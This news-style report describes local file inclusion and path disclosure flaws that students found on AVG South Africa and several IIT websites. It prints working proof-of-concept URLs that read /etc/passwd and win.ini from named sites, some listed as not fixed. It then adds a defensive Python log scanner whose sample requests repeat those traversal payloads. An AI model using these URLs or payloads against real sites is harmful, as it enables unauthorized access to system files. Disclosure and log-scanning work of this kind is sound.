Young Indian Security Researchers Discovered Vulnerability In Several Websites

A young Indian security researcher going by the name of Sandeep Singh, a second-year BSc IT student, contacted us some days back. In his mail, he sent us several vulnerabilities that he and his friend Navneet Singh discovered in different websites. The first website in which he discovered these issues was that of AVG of South Africa. It had two main vulnerabilities: a local file inclusion vulnerability and a full path disclosure vulnerability. They provided us with the URLs as proof of concept. The same vulnerabilities were found in the IIT websites of India. They contacted the institutes regarding this issue and, in response, were thanked and asked for further help by IIT Bombay. Some of these have already been fixed.

AVG of South Africa
POC: http://www.avgantivirus.co.za/admin/index.php?page=C:\WINDOWS\win.ini
FPD: http://www.avgantivirus.co.za/admin/index.php?page=C:\WINDOWS\

IIT Bombay
http://www.phy.iitb.ac.in/olympiad/index.php?page=%2Fetc%2Fpasswd
Status: Fixed

IIT Allahabad
http://placement.iiita.ac.in/mainpage.php?page=..%2F..%2F..%2F..%2Fetc%2Fpasswd
Status: Not Fixed

IIT Madras
http://www.cenlib.iitm.ac.in/docs/library/index.php?page=%2Fetc%2Fpasswd
Status: Not Fixed

IIT Kanpur
http://www.iitk.ac.in/ee/courses/archives/2013/OFDM/index.php?page=%2Fetc%2Fpasswd
Status: Fixed
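
For site owners reviewing their own access logs, the following added example (not part of the original report and not code from any of the affected sites) flags requests whose `page` parameter carries an absolute path, a Windows drive path or a directory traversal, as in the URLs listed above. The request targets are constructed from those query patterns, the allowlist names are assumptions, and the double-encoded case goes slightly beyond what the report shows.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed request targets that reuse the query patterns listed above;
# the paths are placeholders, not the affected sites.
SAMPLE_REQUESTS = [
    "/admin/index.php?page=C:\\WINDOWS\\win.ini",
    "/index.php?page=%2Fetc%2Fpasswd",
    "/mainpage.php?page=..%2F..%2F..%2F..%2Fetc%2Fpasswd",
    "/index.php?page=%252e%252e%252fetc%252fpasswd",  # double-encoded variant
    "/index.php?page=contact",
]

ALLOWED_PAGES = {"home", "contact", "courses"}  # assumed page names

def normalise(value, max_rounds=3):
    """Percent-decode until stable and unify separators before judging."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def classify_page_param(target, param="page"):
    """Return one finding per value of `param` that is not an allowed page."""
    findings = []
    values = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for raw in values.get(param, []):
        value = normalise(raw)
        if value in ALLOWED_PAGES:
            continue
        if re.match(r"[A-Za-z]:/", value):
            findings.append("windows-absolute-path")
        elif value.startswith("/"):
            findings.append("absolute-path")
        elif ".." in value.split("/"):
            findings.append("path-traversal")
        else:
            findings.append("not-in-allowlist")
    return findings

def scan(targets):
    """Map each suspicious request target to its findings."""
    results = {t: classify_page_param(t) for t in targets}
    return {t: f for t, f in results.items() if f}

if __name__ == "__main__":
    for target, findings in scan(SAMPLE_REQUESTS).items():
        print(findings, target)
```

Flagging requests only shows that the parameter is being probed. The server-side fix is to map the parameter to a fixed set of files and to turn off verbose error output, which is what full path disclosure relies on.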
